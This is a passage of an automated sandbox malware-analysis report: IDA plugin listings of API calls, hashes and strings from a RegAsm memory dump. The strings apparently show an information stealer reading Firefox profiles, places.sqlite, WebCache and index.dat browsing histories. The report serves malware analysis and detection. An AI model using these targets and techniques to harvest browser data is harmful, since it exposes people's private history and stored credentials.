                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                              • API String ID: 1534475566-1174173950
                                                                                                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 669240632-0
                                                                                                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                              APIs
                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                              • memset.MSVCRT ref: 00414C87
                                                                                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                              Strings
                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                              • API String ID: 2925649097-2036018995
                                                                                                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                              APIs
                                                                                                                                              • wcschr.MSVCRT ref: 00414458
                                                                                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                              • String ID: "%s"
                                                                                                                                              • API String ID: 1343145685-3297466227
                                                                                                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004087D6
                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                              • memset.MSVCRT ref: 00408828
                                                                                                                                              • memset.MSVCRT ref: 00408840
                                                                                                                                              • memset.MSVCRT ref: 00408858
                                                                                                                                              • memset.MSVCRT ref: 00408870
                                                                                                                                              • memset.MSVCRT ref: 00408888
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2911713577-0
                                                                                                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp
                                                                                                                                              • String ID: @ $SQLite format 3
                                                                                                                                              • API String ID: 1475443563-3708268960
                                                                                                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmpqsort
                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                              • API String ID: 1579243037-1578091866
                                                                                                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModuleProcessTimes
                                                                                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                              • API String ID: 116129598-3385500049
                                                                                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040E60F
                                                                                                                                              • memset.MSVCRT ref: 0040E629
                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                              Strings
                                                                                                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                              • API String ID: 2887208581-2114579845
                                                                                                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                              APIs
                                                                                                                                              • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset
                                                                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                              • API String ID: 2221118986-1725073988
                                                                                                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp
                                                                                                                                              • String ID: $$8
                                                                                                                                              • API String ID: 1475443563-435121686
                                                                                                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1979745280-0
                                                                                                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                              • memset.MSVCRT ref: 00403A55
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                              • String ID: history.dat$places.sqlite
                                                                                                                                              • API String ID: 2641622041-467022611
                                                                                                                                              • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                              • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$File$PointerRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 839530781-0
                                                                                                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                              • String ID: *.*$index.dat
                                                                                                                                              • API String ID: 1974802433-2863569691
                                                                                                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3397143404-0
                                                                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                              APIs
                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                              • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1125800050-0
                                                                                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
